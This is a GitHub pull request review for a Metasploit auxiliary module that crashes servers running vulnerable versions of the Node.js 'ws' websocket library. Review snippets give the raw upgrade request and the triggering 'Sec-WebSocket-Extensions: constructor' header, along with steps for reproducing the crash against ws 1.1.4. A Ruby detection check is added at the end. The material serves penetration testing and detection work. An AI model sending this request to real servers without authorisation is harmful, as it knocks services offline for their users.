Adding ws DoS module #9283
Conversation
This module verifies if ws is vulnerable to DoS by sending a request to the server containing a specific header value. ws is an npm module which handles websockets.
Adding module documentation for ws_dos.
modules/auxiliary/dos/http/ws_dos.rb
req = [ | ||
"GET #{path} HTTP/1.1", | ||
"Connection: Upgrade", | ||
"Sec-WebSocket-Key: test", |
Can the key be randomised? Rex::Text.rand_text_alpha(rand(10) + 5)
1. Start the vulnerable server using the sample server code below `node server.js` | ||
2. Start `msfconsole` | ||
3. `use auxiliary/dos/http/ws_dos` | ||
4. `set RHOST XXX.XXX.XXX.XXX` |
Suggest: set RHOST <IP>
## Vulnerable Application | ||
|
||
[ws < 1.1.5 || (2.0.0 , 3.3.1)] | ||
(https://nodesecurity.io/advisories/550) |
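Review bot: the advisory link in the Vulnerable Application section is split across two lines, `[ws < 1.1.5 || (2.0.0 , 3.3.1)]` followed by `(https://nodesecurity.io/advisories/550)` on the next line; with a line break between `]` and `(` markdown does not render it as a link, so the two parts should sit on one line. The bracketed version expression is also hard to read in rendered docs; spelling out the two affected ranges in words, with the advisory URL as the citation, would make the section clearer.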
"Sec-WebSocket-Extensions: constructor", #Adding "constructor" as the value for this header causes the DoS | ||
"Upgrade: websocket", | ||
"\r\n" | ||
].join("\r\n"); |
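Review bot: two Ruby style points in the request array: the inline comment `#Adding "constructor" as the value for this header causes the DoS` needs a space after `#` (`# Adding ...`), and the trailing `;` after `].join("\r\n")` is unnecessary in Ruby. The comment itself is worth keeping, since it tells the reader which header value triggers the condition and matches the module description.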
Ideally the module would use send_request_cgi from the Msf::Exploit::Remote::Http mixin, rather than using raw TCP.
Unfortunately it seems the HTTP mixin doesn't support websockets and there are no WebSocket libraries :(
Something like this would make the module much cleaner.

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.to_s),
      'headers' => {
        'Connection' => 'Upgrade',
        'Upgrade' => 'websocket',
        'Sec-WebSocket-Key' => Rex::Text.rand_text_alpha(rand(10) + 5).to_s,
        'Sec-WebSocket-Version' => '8',
        'Sec-WebSocket-Extensions' => 'constructor' # Adding "constructor" as the value for this header causes the DoS
      }
    }, 15)
We tried to use send_request_cgi previously, however, we were unable to get the exploit to work because of the lack of WebSocket support.
1. Updated documentation
2. Made the Sec-WebSocket-Key header a random value

I just wanted to check with you on the status of the review of this pull request. Thank you.
1. Start the vulnerable server using the sample server code below `node server.js` | ||
2. Start `msfconsole` | ||
3. `use auxiliary/dos/http/ws_dos` | ||
4. `set RHOST XXX.XXX.XXX.XXX` | ||
4. `set RHOST <IP> |
Missing `
I added the missing `
Added a missing backtick
Die, die!
Release Notes
This adds a Denial of Service exploit for the 'ws' websocket library in Node.js.
This module verifies if ws is vulnerable to DoS by sending a request to the server containing a specific header value. ws is an npm module which handles websockets.
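As an added example (not code from this PR or from the ws project), a Ruby detection check that parses a raw HTTP upgrade request and flags the `Sec-WebSocket-Extensions: constructor` value this module sends; the two sample requests, the `example.invalid` host and the key/version values in them are constructed for the example.

```ruby
# Added example (not part of the PR or of the ws project): a detection
# check that parses a raw HTTP upgrade request and flags the
# Sec-WebSocket-Extensions value this module sends. Extension-list syntax
# follows RFC 6455: extensions separated by ",", parameters by ";".

# Parse the header block of a raw HTTP request into a lowercase-keyed hash.
def parse_upgrade_request(raw)
  head, _body = raw.split("\r\n\r\n", 2)
  request_line, *header_lines = head.split("\r\n")
  headers = {}
  header_lines.each do |line|
    name, value = line.split(':', 2)
    next if name.nil? || value.nil?
    headers[name.strip.downcase] = value.strip
  end
  { request_line: request_line, headers: headers }
end

# Extension names offered in the header, with their parameters stripped.
def extension_names(value)
  value.split(',').map { |ext| ext.split(';').first.strip }.reject(&:empty?)
end

# True for a WebSocket upgrade whose extension list names "constructor",
# the value used by ws_dos. Matched case-insensitively to be conservative.
def ws_dos_request?(raw)
  h = parse_upgrade_request(raw)[:headers]
  return false unless h['upgrade'].to_s.casecmp('websocket').zero?
  return false unless h.key?('sec-websocket-extensions')
  extension_names(h['sec-websocket-extensions']).any? { |n| n.casecmp('constructor').zero? }
end

# Constructed samples: the first carries the same Upgrade/Connection/Extensions
# headers as the module's request (placeholder host), the second is a normal client.
SUSPECT_REQUEST = [
  'GET / HTTP/1.1',
  'Host: example.invalid',
  'Connection: Upgrade',
  'Upgrade: websocket',
  'Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==',
  'Sec-WebSocket-Version: 13',
  'Sec-WebSocket-Extensions: constructor',
  '', ''
].join("\r\n")
BENIGN_REQUEST = SUSPECT_REQUEST.sub(
  'Sec-WebSocket-Extensions: constructor',
  'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits'
)

puts ws_dos_request?(SUSPECT_REQUEST), ws_dos_request?(BENIGN_REQUEST) # true, false
```

The same check can be run over upgrade requests logged at a reverse proxy to spot this handshake before it reaches an unpatched ws server.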
Verification
- `msfconsole`
- `use auxiliary/dos/http/ws_dos`
- `npm i ws@1.1.4`
- `run` in msf

This is an example server we tested against for this vulnerability.